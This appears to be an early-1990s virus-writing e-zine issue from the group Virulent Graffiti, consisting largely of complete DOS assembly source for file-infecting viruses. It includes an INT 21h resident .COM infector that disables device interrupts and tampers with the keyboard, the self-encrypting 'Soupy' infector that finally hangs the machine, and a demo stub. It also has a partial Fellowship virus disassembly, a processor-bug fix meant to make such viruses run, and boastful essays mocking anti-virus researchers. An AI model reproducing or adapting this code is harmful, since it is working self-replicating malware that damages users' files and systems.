cmp dl, 1 ; is date 1st
je dateisthe1st

cmp dl, 0Ah ; is date 10th
je dateisthe10th

cmp dl, 10h ; is date 16th
je dateisthe16th

jmp short datenogood

nop ; F!#K

dateisthe29th:
mov al, 13h ; disks
jmp short setvector
nop ; F!#K

dateisthe1st:
mov al, 16h ; keyboard
jmp short setvector
nop ; F!#K

dateisthe10th:
mov al, 0Dh ; fixed disk
jmp short setvector
nop ; F!#K

dateisthe16th:
mov al, 10h ; video

setvector:
push cs ; ds = cs
pop ds
mov dx, bigproblems - intovirus
int 6Dh

datenogood:
mov ax, 40h ; bios
mov ds, ax

mov ax, ds:[006Eh] ; clicks since 12AM
mov bx, ds:[006Ch]

push cs ; ds = cs
pop ds

mov si, 0017h ; keyboard status
mov cl, ds:[si]
cmp cl, 1 ; only right shift
je noactivate

; this here checks for approximately 3:10 to 3:15 vicinity

cmp ax, 0Fh ; timer hi = 0fh
jne noactivate

cmp bx, 2AA8h ; timer lo < 2AA8h
jb noactivate

cmp bx, 3774h ; timer lo > 3774h
ja noactivate

mov byte ptr [si], 1 ; right shift only

mov ax, 3509h ; get int 9 vector
int 21h

push es
push bx

pop dx
pop ds

mov ax, 256Ah ; int 6ah = int 9
int 21h

push cs
pop ds

mov dx, int_9_handler - intovirus ; set our int 9
mov ax, 2509h
int 21h

noactivate:
pop ds
pop es
pop si
pop di
pop dx
pop cx
pop bx
pop ax

cmp ah, 4Bh ; execute call?
je yeppersitsanexecute

gobackfromwhenceyoucame: ; return to int 21h
db 0EAh ; jmp far ptr
db 60h, 14h, 02fh, 02h ; old int 21h vector

returntoitall:
pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
jmp short gobackfromwhenceyoucame

okayreamit:
mov ax, 2524h ; set int 24h
mov si, old24 - intovirus
mov dx, cs:[si]
mov ds, cs:[si+2]
int 21h

push cs
pop ds

mov si, filetime - intovirus ; set file time
mov cx, [si]
mov dx, [si+2]
mov ax, 5701h
int 21h

mov ah, 3Eh ; close it up
int 21h

mov si, fileofs - intovirus ; load address
mov dx, cs:[si]
mov ds, cs:[si+2]

mov ax, 4301h ; set attribs back
mov si, attribs - intovirus
mov cl, cs:[si]
xor ch, ch
int 21h

jmp short returntoitall

yeppersitsanexecute:
push ax
push bx
push cx
push dx
push si
push di
push bp
push ds
push es

mov ax, 4300h ; get attributes
int 21h
jc okayreamit ; bad file?

mov si, attribs - intovirus ; save attribs
mov cs:[si], cl

mov si, fileofs - intovirus ; save file address
mov cs:[si], dx
mov cs:[si+2], ds

mov ax, 3524h ; get int 24h vector
int 21h

mov si, old24 - intovirus ; save int 24h
mov cs:[si], bx
mov cs:[si+2], es

mov ax, 2524h ; set int 24h
push cs
pop ds
mov dx, bigproblems - intovirus
int 21h

mov si, fileofs - intovirus ; reload file addr
mov dx, cs:[si]
mov ds, cs:[si+2]

mov ax, 4301h ; set attributes
mov cx, 20h ; archive
int 21h
jc allpurposeerror ; catch criticals

mov ax, 3D02h ; open for write
int 21h
jc allpurposeerror ; more error checks

mov bx, ax ; F!#K

mov ax, 5700h ; get file time
int 21h
jc allpurposeerror ; more error checks!

mov si, filetime - intovirus ; save file time
push cs
pop ds
mov [si], cx
mov [si+2], dx

mov ah, 3Fh ; read 2 bytes into
mov cx, 2
mov dx, (furtherintovirus + 4) - intovirus ; buffer
int 21h
jc allpurposeerror ; damn these checks!

mov si, (buffa2 - 2) - intovirus
cmp word ptr [si], 5A4Dh ; misnamed exe ?!?
je allpurposeerror ; fuckin' checks

mov ah, 3Fh ; read 1 byte into
mov cx, 1
mov dx, (furtherintovirus + 10) - intovirus ; buffer
int 21h
jc allpurposeerror ; !!!

mov ax, 4202h ; LSeek end
xor cx, cx
xor dx, dx
int 21h
jc allpurposeerror ; AARRRGGGHHH!!!

cmp dx, 0 ; if size > 65535
jg allpurposeerror

cmp ax, 4 ; if size < 4
jb allpurposeerror

cmp ax, 0FBF0h ; if size > 64496
ja allpurposeerror

mov si, sizestore - intovirus ; save size
mov [si], ax

mov cx, ax ; size in cx

sub ax, 3 ; mod for jmp near

mov si, (jumpnear + 1) - intovirus ; save size - 3
mov [si], ax

add cx, 100h ; size + 100h
mov si, (modme1 + 1) - intovirus
mov [si], cx ; modify first delta

add cx, 151h ; size + 251h

mov si, (modme2 + 1) - intovirus
mov [si], cx ; modify 2nd delta

jmp short continueinfect
nop ; F!#K
allpurposeerror:
jmp okayreamit

continueinfect:
mov ax, 4200h ; LSeek from start
xor cx, cx ; Size - 2
mov si, sizestore - intovirus
mov dx, [si]
sub dx, 2
int 21h

mov ah, 3Fh ; read 2 bytes
mov cx, 2
mov dx, saved2 - intovirus
int 21h

mov si, saved2 - intovirus ; load saved 2
mov ax, [si]

cmp ax, 2206h ; infected?
je allpurposeerror

mov ax, 4200h ; LSeek start
xor cx, cx
xor dx, dx
int 21h

mov ah, 40h ; write jmp near
mov cx, 3
mov dx, jumpnear - intovirus
int 21h

mov ax, 4202h ; LSeek end
xor cx, cx
xor dx, dx
int 21h

mov si, what - intovirus ; inc counter
inc word ptr [si]

mov si, what2 - intovirus
push word ptr [si]
mov word ptr [si], 0

mov ah, 40h ; write file
mov dx, intovirus - intovirus ; duh!
mov cx, endofvirus - intovirus
int 21h

mov si, what - intovirus ; dec counter
dec word ptr [si]

pop ax ; pop off other valu
inc ax

mov si, what2 - intovirus ; save other valu
mov [si], ax
jmp okayreamit

bigproblems:
xor al,al ; a little xtreme?!?
iret

int_9_handler:
push ax
push ds

mov ax, 0040h ; bios
mov ds, ax

mov ah, byte ptr ds:[006ch] ; clicks afta 12 AM
cmp ah, 17h ; past time?
ja itsal

  
lover

and ah, 6
or ds:[0017h], ah ; fuck that flag!!!

itsallover:
pop ds
pop ax
int 6ah
iret

db 06h, '"'
endofvirus:
end start
===========================================================================

I saw no need to write a stand-alone demonstration for this rather
unflattering virus, as it displays nothing, and only disables device
access and fucks with the keyboard...
======================
Soupy Virus Source
By The Attitude Adjuster
and
AccuPunk
======================

With the release of this virus marks the absolute end for all
boring direct-action COM infectors from Virulent Graffiti... if some pop
up in the future, bearing our name, and do not have revolutionary or
funny activation stages, they are NOT from us...

Anyway, I am at a loss as to why I should use anything but the DOC
I wrote for this, but, here's what Patti says, and what I say, you compare
and contrast who does it better!

==========================================================================
Virus Name: Soupy
Aliases:
V Status: New
Discovered: January, 1993
Symptoms: .COM file growth; TSR; message; system hangs
Origin: United States
Eff Length: 1,072 Bytes
Type Code: PRC - Parasitic Resident .COM Infector
Detection Method: Novi 1.15a+, CPAV/N
Removal Instructions: Delete infected files

General Comments:
The Soupy virus was submitted in January, 1993, and is from the
United States. Soupy is a non-resident, direct action infector
of .COM programs, but not COMMAND.COM. In the case of advanced
infections, it may install a portion of itself memory resident in
order to facilitate the activation mechanism in the virus.

When a program infected with the Soupy virus is executed, the
Soupy virus will infect one .COM file located in the current
directory, as well as update a counter within the viral code.
Programs infected with the Soupy virus will have a file length
increase of 1,072 bytes with the virus being located at the end
of the file. The program's date and time in the DOS disk directory
listing will not be altered.

The Soupy virus activates once the counter within the viral code
has reached 11, indicating the 11th generation of the virus has
been reached. At this time, the virus will install a portion of
itself in memory of 736 bytes, hooking interrupt 08. Once the
memory resident portion of the virus has been installed, it will
display the following messages one at a time every three minutes:

"Unsuspecting user, 12 o'clock!"
"Get ready... 'cause... THERE'S A VIRUS IN YOUR SOUP!"
"From the guys that brought you Lythyum, Radyum, and
VioLite comes:"
"The Soupy Virus, (k) 1992 VG Enterprises,
216/513/602/904/703"
"By The Attitude Adjuster & AccuPunk!"
"Hurry! Hire an Anti-Virus Professional!
Increase Wallet Space!"
"...hmmm, ya' know, I think I''ll halt now..."

Once the last message above is displayed, the system will be
halted or hung. The above messages are encrypted within the
Soupy viral code, as are the following additional text strings:

"[Soupy] The Attitude Adjuster & AccuPunk,
VG 08/23/92 to 12/02/92"
"*.COM"
"Bad command or file name"

==========================================================================
...and now me...

==========================================================================
Virus Name: Soupy
Aliases: Virus in Your Soup
Author: The Attitude Adjuster & AccuPunk
Group: Virulent Graffiti
Scan ID:
V Status: Frozen to Death
Discovery: See, we were in this guy's disk box...
Symptoms: .COM files altered; Messages;
Orgin: West Bumblefuck, Ohio
Eff Length: 1073 Bytes
Res Length: 736 Bytes
Type Code: Parasitic Non-Resident .COM Infector
Detection Method:
Removal Instructions: Delete infected files

General Comments:

The Soupy virus is a self-encrypting direct action infector
of .COM programs. The virus, upon execution, will search the
current directory for an uninfected .COM program. If none
are found, the virus will restore the host file and continue
execution.

The Soupy virus mantains an infection counter. When this counter
reaches 11, the virus will check for a copy of itself in memory,
and if not found, make itself the owner of INT 8 and go
resident.

Approximately every 3 minutes, the virus will display the next
of 7 messages, finally causing the machine to do a dynamic
halt on the final message.

==========================================================================
And, just to get the story straight, I wrote all the resident
stuff out of boredom, and, the COM engine was what AccuPunk presented as
his coding example to join the group. I just optomized the code, and added
my residency, and I was ready to go...

This virus sucks... mainly because I didn't know enough back then,
but, that has all changed...

==========================================================================
; -] "Oh, waiter [- A virus to pay tribute to
; ==] [== Anti-Virus Professionals Everywhere!
; -] THERE'S [-
; ] [
; -] A [- Radyum's Little Son
; ==] [==
; -] VIRUS [-
; ] [ We like Bob Ross, but, we like
; -] IN MY [- ourselves a lot better.
; ==] [==
; -] SOUP!!!" [-
;
; An original virus by Accu-Punk and The Attitude Adjuster
; of Virulent Graffiti (216/914/513/602)

; Greetz: Mom, My Modem, Accu-Punk, The Attitude Adjuster,
; The Fly, Casper, Chief, Mercury, any other VG Member.

.model tiny
.code ; code segment, tiny model -- CS = DS = ES = SS

ComStart EQU 100h

org 100h ; generate .COM file

entry:
db 0e9h, 00, 00 ; Jmp decrypt

decrypt:
mov si, offset start_code
mov cx, (offset end_code - offset start_code)/2
code_loop:
db 81h, 34h, 0, 0 ; xor word ptr [bx],0
lodsw
loop code_loop

start_code: ; get delta
call get_delta
get_delta:
pop bp
sub bp, offset get_delta

xor ax, ax
mov ds, ax

les ax, ds:[24h*4] ; Load Int 24 Entry

mov word ptr Cs:[offset I_24+2+bp], es ; Save it
mov word ptr Cs:[offset I_24+bp], ax

lea dx, Cs:[offset int_24h_entry+bp] ; Place new one
mov word ptr ds:[24h*4], dx
mov word ptr ds:[92h], cs

push cs
push cs
pop ds
pop es

cld ; Restore COM
mov cx, 3
mov di, 100h
lea si, [bp+first_3]
rep movsb

lea dx, [bp+newDTA] ; Set Up New DTA
mov ah, 1ah
int 21h

lea dx, [bp+com_mask] ; Find First *.COM
mov ah, 4eh
find_loop:
mov cx, 7
int 21h
jc done_infecting ; If Error, Exit

mov ax, 3d00h ; Open File for Read
lea dx, [bp+newDTA+1Eh]
int 21h
jc find_next ; Find another

xchg ax, bx ; Handle in BX

mov ah, 3fh ; Read File
mov cx, 3
lea dx, [bp+buffer]
int 21h

mov ah, 3eh
int 21h

cmp word ptr [bp+newDTA+1Eh], 'OC' ; Command.Com?
je find_next

cmp word ptr [bp+newDTA+1Ah], (65535-(heap_end - start_code))
ja find_next ; too big

cmp word ptr [bp+newDTA+1Ah], 300h
jb find_next ; too little bitty

mov ax, word ptr [bp+newDTA+1Ah]
push ax
sub ax, (end_code - decrypt) + 3 ; correct JMP
cmp ax, word ptr [bp+buffer+1]
je find_next ; not to end!
jmp infect

find_next:
mov ah, 4fh
jmp find_loop

done_infecting:
mov ah, 1ah
mov dx, 0080h
int 21h ; set up old DTA

pop ax

xor ax,ax
push ax
pop ds
les ax, ds:[08h*4]
push cs
pop ds

mov word ptr [Old08+Bp], Ax
mov word ptr [Old08+2+Bp], Es
add ax, ((GetOut-1)-Int_08_Handler)
mov bx, ax
cmp word ptr Es:[Bx], 0EA58h
je quit
push cs
pop es

cmp byte ptr [Counter+Bp], 0ah
jle quit

lea Si, [Offset Int_08_Handler+Bp] ; copy us
mov Di, 0100h
mov Cx, Offset End_Handler-Offset Int_08_Handler
rep MovSb

xor ax, ax ; interrupt table
mov ds, ax
cli
mov ax, 100h
mov word ptr Ds:[08h*4], ax
mov word ptr Ds:[08h*4+2], cs
sti

push cs
pop ds
push cs

mov ah, 49h ; Deallocate Env.
mov bx, word ptr cs:[02ch]
mov es, bx
int 21h
pop es

Mov ah, 9
Lea dx, [Offset Bullshit+Bp]
Int 21h

Mov Ax, 3100h
mov Dx, (((Offset End_Handler-Offset Int_08_Handler)+100h) / 16) + 1
Int 21h
Int 20h

Quit:
xor ax, ax
mov ds, ax

mov bx, word ptr Cs:[offset I_24+bp]
mov es, word ptr Cs:[offset I_24+2+bp]

mov word ptr ds:[24h*4], bx ; Restore int 24h
mov word ptr ds:[24h*4+2], es

push cs
push cs
pop ds
pop es

mov dx, 100h ; We Are Done!
jmp dx

infect:
cld
lea si, [bp+buffer]
lea di, [bp+first_3]
push si
mov cx, 3
rep movsb ; save original first three bytes
pop di ; now we write to the buffer...
mov al, 0e9h ; change first three bytes of target file
stosb ; to jump to the end, which will be the
pop ax ; first byte of the viral code.
sub ax, 3 ; correct for the jump opcode size
stosw ; and put the displacement at [DI].

xor cx, cx
lea dx, [bp+newDTA+1Eh]
mov ax, 4301h ; set attributes to nothing
int 21h

mov ah, 3dh
mov al, 2 ; read/write
int 21h
xchg ax,bx ; ok, we're gonna be boring and use XCHG

mov ah, 40h ; bx = filehandle
mov cx, 3
lea dx, [bp+buffer]
int 21h ; write 3 bytes at buffer to file

mov ax, 4202h ; LSEEK from end of file
xor cx, cx ; seek 0 bytes from end
xor dx, dx ; set up for copying the virus
int 21h

push bx
get_new_code: ; get new encryption word
mov bx, 40h
mov es, bx
mov bx, 6Ch
mov dx, word ptr es:[bx] ; dx = encryption_word
or dx, dx ; dx == 0? (no effect)
jz get_new_code ; nah, get a new one
mov word ptr [bp+code_loop+2], dx
pop bx
push cs
pop es

copy_code:
cld
push ax

lea di, [bp+temp]
mov al, 53h ; push bx
stosb

lea si, [bp+decrypt]
mov cx, start_code-decrypt ; copy the code unaltered first
push si
push cx
rep movsb ; copy decrypt
lea si, [bp+write]
mov cx, end_write-write
rep movsb ; copy write
pop cx
pop si
rep movsb ; copy decrypt again
mov ax, 0C35Bh ; POP BX, retn
stosw
pop ax ; ax = filesize

patch_bx_offset:
mov dx, word ptr [bp+decrypt+1] ; dx = offset start_code rel 100h
sub dx, bp
sub dx, 3
add dx, ax ; add filesize to offset
mov word ptr [bp+decrypt+1], dx ; patch it

inc byte ptr [bp+counter]
call temp

finish_infection:
mov ax, 5701h
mov cx, word ptr [bp+newDTA+16h] ; cx = file time
mov dx, word ptr [bp+newDTA+18h] ; dx = file date
int 21h
xor cx, cx
mov ax, 4301h
mov cl, byte ptr [bp+newDTA+15h] ; cl = attributes
lea dx, [bp+newDTA+1Eh]
int 21h

mov ah, 3eh
int 21h
jmp done_infecting

write:
pop bx
mov ah, 40h
mov cx, end_code - decrypt
lea dx, [bp+decrypt]
int 21h
push bx
end_write:

Int_24h_Entry Proc Far
Mov Ax, 3 ; Process Terminate
Iret ; Do a LOT, Eh?
EndP

Int_08_Handler Proc Far
Push Ax
Push Bx
Push Cx
Push Dx
Push Si
Push Di
Push Bp
Push Es
Push Ds

Dec Word Ptr Cs:[TCounter]
Jz Do_It

LeaveRite:
Pop Ds
Pop Es
Pop Bp
Pop Di
Pop Si
Pop Dx
Pop Cx
Pop Bx
Pop Ax

GetOut:
Db 0eah ; JMP Far PTR
Old08 Dd ?

_Iet Db 1
_Counter Dw 1092

Do_It:
Push Cs
Push Cs
Pop Es
Pop Ds

Mov Word Ptr Cs:[TCounter], 1092

Mov Si, Start_Chain
Xor Cx, Cx
Mov Cl, Byte Ptr Cs:[Iet]
Xor Ax, Ax
Chain_Loop:
LodSb
Add Si, Ax
Loop Chain_Loop

LodSb
Xor Cx, Cx
Mov Cl, Al

XChg Bp, Si
Mov Ah, 0fh
Int 10h

Mov Ax, 1300h
Mov Bx, 000Fh
Xor Dx, Dx
Int 10h
Inc Byte Ptr Cs:[Iet]
Mov Cx, 50
C2:
Push Cx
Mov Cx, 0ffffh
RP:
Loop RP
Pop Cx
Loop C2

Cmp Byte Ptr Cs:[Iet], 8
Je Quonto
Jmp LeaveRite
Quonto:
Cli
Jmp $
EndP

_Start_Chain:
db 0
db 30, 'Unsuspecting user, 12 o''clock!'
db 52, 'Get ready... ''cause... THERE''S A VIRUS IN YOUR SOUP!'
db 66, 'From the guys that brought you Lythyum, Radyum, and VioLite comes:'
db 61, 'The Soupy Virus, (k) 1992 VG Enterprises, 216/513/602/914/703'
db 36, 'By The Attitude Adjuster & AccuPunk!'
db 62, 'Hurry! Hire an Anti-Virus Professional! Increase Wallet Space!'
db 43, '...hmmm, ya'' know, I think I''ll halt now...'

_End_Chain:
Start_Chain = (_Start_Chain - Int_08_Handler) + 100h
End_Chain = (_End_Chain - Int_08_Handler) + 100h
Iet = (_Iet - Int_08_Handler) + 100h
TCounter = (_Counter - Int_08_Handler) +100h
End_Handler:

; DATA SPACE

name_date db 00,'[Soupy] The Attitude Adjuster & AccuPunk, VG',00
db '08/23/92 to 12/02/92',00
first_3 db 0CDh, 20h, 90h ; put return to dos opcodes at 100h
com_mask db '*.COM',0
counter db 0
BullShit db 'Bad command or file name',0dh,0ah,'$'
end_code = $ ; end of encryption and writing...

buffer db 3 dup (?)
newDTA db 50 dup (?)
I_24 dd ?
temp: db ((start_code - decrypt)*2 + (end_write-write) + 5) dup (?)

heap_end = $ ; marks end of heap

end entry
==========================================================================
; Very shitty and hurredly written stand alone demonstration for the Soupy
; virus, By The Attitude Adjuster.

; Assemble with:
; tasm sbomb /m2
; tlink sbomb /t

; Wait for the messages! No delays have been removed!

.model tiny
.code

org 100h
entry:
mov ax, 3508h
int 21h

mov word ptr [Old08], Bx
mov word ptr [Old08+2], Es
add ax, ((GetOut-1)-Int_08_Handler)
mov bx, ax
cmp word ptr Es:[Bx], 0EA58h
je quit
push cs
pop es

mov dx, offset Int_08_Handler
mov ax, 2508h
int 21h

Mov ah, 9
Lea dx, [Offset Bullshit+Bp]
Int 21h

mov Dx, Offset Heap_End
Int 27h
Quit:
Int 20h

Int_08_Handler Proc Far
Push Ax
Push Bx
Push Cx
Push Dx
Push Si
Push Di
Push Bp
Push Es
Push Ds

Dec Word Ptr Cs:[Counter]
Jz Do_It

LeaveRite:
Pop Ds
Pop Es
Pop Bp
Pop Di
Pop Si
Pop Dx
Pop Cx
Pop Bx
Pop Ax

GetOut:
Db 0eah ; JMP Far PTR
Old08 Dd ?

Iet Db 1
Counter Dw 1092

Do_It:
Push Cs
Push Cs
Pop Es
Pop Ds

Mov Word Ptr Cs:[Counter], 1092

Mov Si, Offset Start_Chain
Xor Cx, Cx
Mov Cl, Byte Ptr Cs:[Iet]
Xor Ax, Ax
Chain_Loop:
LodSb
Add Si, Ax
Loop Chain_Loop

LodSb
Xor Cx, Cx
Mov Cl, Al

XChg Bp, Si
Mov Ah, 0fh
Int 10h

Mov Ax, 1300h
Mov Bx, 000Fh
Xor Dx, Dx
Int 10h
Inc Byte Ptr Cs:[Iet]
Mov Cx, 50
C2:
Push Cx
Mov Cx, 0ffffh
RP:
Loop RP
Pop Cx
Loop C2

Cmp Byte Ptr Cs:[Iet], 8
Je Quonto
Jmp LeaveRite
Quonto:
Cli
Jmp $
EndP

Start_Chain:
db 0
db 30, 'Unsuspecting user, 12 o''clock!'
db 52, 'Get ready... ''cause... THERE''S A VIRUS IN YOUR SOUP!'
db 66, 'From the guys that brought you Lythyum, Radyum, and VioLite comes:'
db 61, 'The Soupy Virus, (k) 1992 VG Enterprises, 216/513/602/914/703'
db 36, 'By The Attitude Adjuster & AccuPunk!'
db 62, 'Hurry! Hire an Anti-Virus Professional! Increase Wallet Space!'
db 43, '...hmmm, ya'' know, I think I''ll halt now...'
End_Chain:
End_Handler:

BullShit db 'Bad command or file name',0dh,0ah,'$'
end_code = $ ; end of encryption and writing...

heap_end = $ ; marks end of heap

end entry
==========================================================================
=======================
Rapidly Approaching
By The Attitude Adjuster
=======================

Virulent Graffiti is rapidly approaching 1 year of life, amazing
that we could hold together that long, eh? We actually survived the summer,
the return of the school year... the fact that we were doing nothing, and
an abrupt name change, VG to VGVPO.

Actually, I am approaching the 1 year mark on learning 80x86
assembly... quite strange, a year later, to look back that the total shit
code that I was doing in WASM, and to see some of the things I was doing,
and actually calling viruses!

On the personal level, I am quite happy with myself, and greatful
of the people like the Dark Avenger, Dark Angel, and others that have the
know-how and desire to help teach the world about virus writing. I am
amazed at the progress that I have made myself, both in virus writing, and
in programming in general... and especially that I have the highest poster
status on Digital Warfare Private (at least, when I wrote this...)

On the group level, I feel deflated, but good... an idea that was
pushed onto me by The Fly, on March 14th, 1992, becoming the semi-large
thing that it has become today... really nice, if you ask me, but, then
again, who does...

Now comes the question of what I'm going to do this year... We have
lots of things waiting in the wings for that little extra push to get them
going... a sub-stealth virus, a multipartite virus, and a little code
generator (not for generating viruses, but, for generating dazzingly boring
encryption and decryption routines, without actaully being a polymorphing
engine!)... hopefully, little side projects I have, like loaders, sound
routines, and such will fall into place, and we can grab a little ground in
the demo-group world as well...

Big ideas for a kid from a small town in Ohio, eh? Maybe... maybe
not... Certainly, in Telcom, no one is there to ask my age, or for my
college degree... all I need to do is whip out a little code, throw the
reputation around a little... wire them a couple hund- err, you get what I
mean... It's all open to us, sounds fun, eh?

Damn straight it is...
========================
The Confusion Ended?
By The Attitude Adjuster
========================

In the end, we decided it would better if we began releasing our
research viruses to anti-virus professionals (bah!). I called Patricia
Hoffman's board, cringing at the thought of... Wildcat! (it just isn't
right without the !). I construct an account, promptly forgetting the
password I assigned to it, and, uploaded our old and useless COM infectors.

After the gloriously short upload (9600 is great...), I left Patti
this little letter...

===========================================================================
From : T.A. ADJUSTER Number : 52 of 59
To : PATRICIA HOFFMAN Date : 01/17/93 6:01pm
Subject : Uploads Reference : NONE
Read : 01/18/93 12:11pm (REPLIES) Private : NO
Conf : 002 - Virus Q & A (Open Msgs)

I have uploaded to you some OLD VG viruses, as we are now doing TSR
COM/EXE infectors. Hopefully, when we move on to boot infectors, we
will remember to upload those here as well.

In the meantime, please send these to whoever does research work for
you, as I'm sure it can't be you, I mean, you don't even know your own
name.

Anyway, they all have DOC files with them, that are totally correct,
though I may have 'forgot' and left out a couple of features. None of
these viruses are intentionally distructive, just loads and loads of
fun.

Anyway, if you want to be the index of ALL viruses, you better move to
place these in the index, as they are on our support boards, and can be
downloaded and placed active by anyone, though we as a group will not
release viruses into the wild.

I thought I had an account on here earlier. Yeesh, I hope you didn't
delete it... anyway, I'd like to ask that you keep my account live, as
I enjoy downloading your fine VSUM publication. VG is too poor to
afford to register it, however. Could we get, maybe, a charity
subscription?


The Attitude Adjuster
===========================================================================

So... a few days later, I note this reply, when I log in to see if
the new VSUM is out yet...

===========================================================================
From : PATRICIA HOFFMAN Number : 54 of 59
To : T.A. ADJUSTER Date : 01/18/93 12:15pm
Subject : Uploads Reference : 52
Read : NO Private : NO
Conf : 002 - Virus Q & A (Open Msgs)

Well, the only time I don't know my own name is when someone calls the
wrong "Patricia Hoffman" because they got the phone number from
Information or the phone book. My home phone number is unlisted, but
there are a couple of other Patricia Hoffman's in Silicon Valley as
well. If you are referring to a certain conference call of about 9-10
months ago when 13 or so young men tried to contact me, they called the
WRONG Patricia Hoffman..... I was at home reading a novel, and didn't
know about the call until McAfee called and asked why I didn't speak to
the "young men".
===========================================================================

Well... interesting... the truth? Who knows... I'd kind of like to
talk to her, regardless... I just have nothing that dials alliance, and I
really would like to share the experience with others...
===============================
'Shit... What's wrong NOW!'
By The Attitude Adjuster
===============================

(Written in early January, pre-VioLite ][ and DWI release.)

So, AccuPunk and I are hard at work, coding litle bits of drivel,
and our two main projects, DWI and VioLite ][. For some strange reason,
these viruses refused to work. We spent many hours in our protected-mode
debuggers tracking down the cause, but, it was finally my genius, and a
little work in DOS Debug that saved the day.

The virus engines worked fine, the resident code in DWI being
okay, and the file-location code in VioLite2 being dandy. When traced thru
in both SoftIce and Debug, the viruses would work, but, yet, when ran from
a command line, or let loose with a Go instruction, my machine would crash
a horrible GPF death, while AccuPunk's would not. He has a 386DX, I have
a new 486SX, this is the key.

Here is the root of the problem.

===========================================================================
Taken from 'An Introduction to Non-Overwriting Virii,' 40Hex-8

mov ax,es ; AX = PSP segment
add ax,10h ; Adjust for PSP
add word ptr cs:[si+jmpsave+2],ax
add ax,word ptr cs:[si+stacksave+2]
cli ; Clear intrpts for stack manip.
mov sp,word ptr cs:[si+stacksave]
mov ss,ax
sti
db 0eah ; jmp ssss:oooo
jmpsave dd ? ; Original CS:IP
stacksave dd ? ; Original SS:SP
jmpsave2 dd 0fff00000h ; Needed for carrier file
stacksave2 dd ?
===========================================================================

We were using this clip of DA code, mainly because it was the Right
Thing, and why try and improve on perfection. Alas, this code is the root
of all the problems.

I assemble the following code:

===========================================================================
.model tiny
.code
org 100h

start:
mov byte ptr [start], 0cch ; place int 3 at 100h

mov ax, cs ; codeseg in ax

add word ptr [JumpAdd+2], ax ; add to jmp far ptr

db 0eah
JumpAdd dd 00000100h ; cs:0100

end start
===========================================================================

It crashes miserably on my machine, but not on my 8086. I now know
why. Hurredly, I recoded the thing to look like this:

===========================================================================
.model tiny
.code
org 100h

start:
mov byte ptr [start], 0cch ; place int 3 at 100h

mov ax, cs ; codeseg in ax

add word ptr [JumpAdd+2], ax ; add to jmp far ptr

jmp short aftajump

PreJump:
db 0eah
JumpAdd dd 00000100h ; cs:0100
AftaJump:
jmp short prejump

end start
===========================================================================

This time, the code works, I have my cuprit, my processor, and it's
blasted 25 byte prefetch.

Let me explain. When we affected the JMP FAR offset in memory, we
did not affect it in the processor, which pre-fetches the next 25 bytes in
memory. The JMP around the code causes the prefetch to be reloaded, and
allows the jump to work.

So, this means, an entire group of viruses will not work on newer hi
end machines. I tested this, all viruses I ran that had the DA engine in
them crashed and burned on every 486 that I tested them on. Any 80486 that
is exactly Intel specs (and they all will be for a while, as only Intel is
making them) will crash on this code.

The solution? Here's mine, it may not be pretty, but, it works.

===========================================================================
mov ax,es ; AX = PSP segment
add ax,10h ; Adjust for PSP
add word ptr cs:[si+stacksave+2], ax

cli ; Clear intrpts for stack manip.
mov sp,word ptr cs:[si+stacksave]
mov ss,ax
sti

mov bx, word ptr cs:[si+jmpsave]
add bx, ax
push bx

mov bx, word ptr cs:[si+jmpsave+2]
add bx, ax
push bx

retf
jmpsave dd ? ; Original CS:IP
stacksave dd ? ; Original SS:SP
jmpsave2 dd 0fff00000h ; Needed for carrier file
stacksave2 dd ?
===========================================================================

This is the final code we put into DWI and VioLite2. Not pretty, but
the damn thing works. With no self-modifying code that relies on the
prefetch, there isn't an easy way for this to crash...
======================================
Disassembly of the Fellowship Virus
By The Attitude Adjuster
======================================

Well, I thought that I should just continue disassembling whatever
I could find, as part of that 'keeping up my skills.' I found this,
decided that it was a piece of uneventful and thouroghly boring, and none
the more bug free code, and decided that you should have it...

It seems to have a semi-unique way of organization during the
memory residency... the loading of the host again, etc... also, there is
a tiny bit of debugger resistance, but, this tactic could be expanded
upon to create huge amounts of hell for non-protected mode debuggers.

Really, this thing shouldn't work... if it follows theory, it
should eat all available handles on the system after a few (more for us
with higher FILES= settings) infections...

This is what Patti says... notice, this is an EXE infector, yet one
of the symptoms is COM growth! Wild... I never found that subroutine while
I was disassembling...

==========================================================================
Virus Name: Fellowship
Aliases: 1022, Better World, Fellow
V Status: Rare
Discovered: July, 1990
Isolated: Australia
Symptoms: TSR; .COM & .EXE file growth
Origin: Malaysia
Eff Length: 1,019 - 1,027 Bytes
Type Code: PRsE - Parasitic Resident .EXE Infector
Detection Method: ViruScan, F-Prot, NAV, IBM Scan, AVTK, Novi, Sweep,
CPAV, UTScan, VirexPC, Gobbler2, VBuster, AllSafe,
ViruSafe, UTScan, Trend, Iris, VNet, Panda, VET,
Detect+, IBMAV, DrVirus, Vi-Spy,
NShld, LProt, CPAV/N, Sweep/N
Removal Instructions: CleanUp, F-Prot, NAV, or delete infected files

General Comments:
The Fellowship or 1022 virus was isolated in Australia in July 1990.
Fellowship is a memory resident generic infector of .EXE files. It
does not infect .COM or overlay files.

The first time a program infected with the Fellowship virus is
executed, the virus will install itself memory resident as a 2,048
byte TSR in low system memory. Available free memory will be
decreased by a corresponding 2,048 bytes. Interrupt 21 will also
now be controlled by the virus.

After the virus is memory resident, the virus will infect .EXE files
when they are executed. Infected .EXE files will increase in size
by between 1,019 and 1,027 bytes. The virus's code will be located
at the end of infected files.

Infected files will contain the following text strings very close to
the end of the file:

"This message is dedicated to
all fellow PC users on Earth
Toward A Better Tomorrow
And A Better Place To Live In"

"03/03/90 KV KL MAL"

This virus is believed to have originated in Kuala Lumpur, Malaysia.
==========================================================================
; Disassembly of the Fellowship Virus, done by The Attitude Adjuster for
; Infectious Diseases Issue 3.

; For a byte-for-byte matchup, assemble as follows:
; tasm fellow /m2
; tlink fellow

.model tiny
.code
org 000h
start:
mov ax, 0D000h ; RUTHERE call
int 21h
cmp bx, 1234h
jne installvirus ; if not...

mov bx, es
add bx, 10h ; account for PSP
add word ptr cs:[oldcsip+2], bx ; add to CS
jmp dword ptr cs:[oldcsip] ; get there...

ninthflag db 0

paramblock: ; need defs? get a
envsegment dw 0CE4h ; DOS manual...
cmdlineoffset db 80h, 00h
cmdlinesegment dw 12C9h
fcb1offset db 5Ch, 00h
fcb1segment dw 12C9h
fcb2offset db 6Ch, 00h
fcb2segment dw 12C9h
loadpoint dw 0

oldcsip dd 0FFF00000h

installvirus:
cld ; !!!
cli
push es

mov bx, es
add bx, 10h ; account for PSP
mov es, bx ; ES = 1st EXE Seg

xor bx, bx
mov ds, bx ; DS = 0000

push word ptr ds:[0000] ; save ssi vector
push word ptr ds:[0002] ; save ssi vector

